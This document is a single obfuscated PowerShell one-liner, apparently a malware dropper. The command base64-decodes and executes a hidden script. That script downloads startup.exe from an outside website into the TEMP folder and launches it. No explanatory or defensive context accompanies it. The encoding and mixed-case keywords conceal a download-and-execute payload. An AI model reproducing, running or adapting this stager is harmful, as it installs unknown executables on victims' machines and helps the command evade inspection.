iex([SYSTEm.teXT.eNcODINg]::UTF8.getstRiNg([System.coNvERt]::FroMbAsE64sTRinG('CihOZXctT2JqZWN0IFN5U1RFTS5OZXQuV0VCQ0xpRU50KS5kb1dObE9hREZpTEUoJ3d3dy5sb25kb25vZmZpY2VzLndlYnNpdGUvZG93bmxvYWQvc3RhcnR1cC5leGUnLCIkRU5WOlRFTVBcc3RhcnR1cC5leGUiKTtTdGFydC1Qcm9jZXNzICgiJEVOVjpURU1QXHN0YXJ0dXAuZXhlIikKCg==')));exit

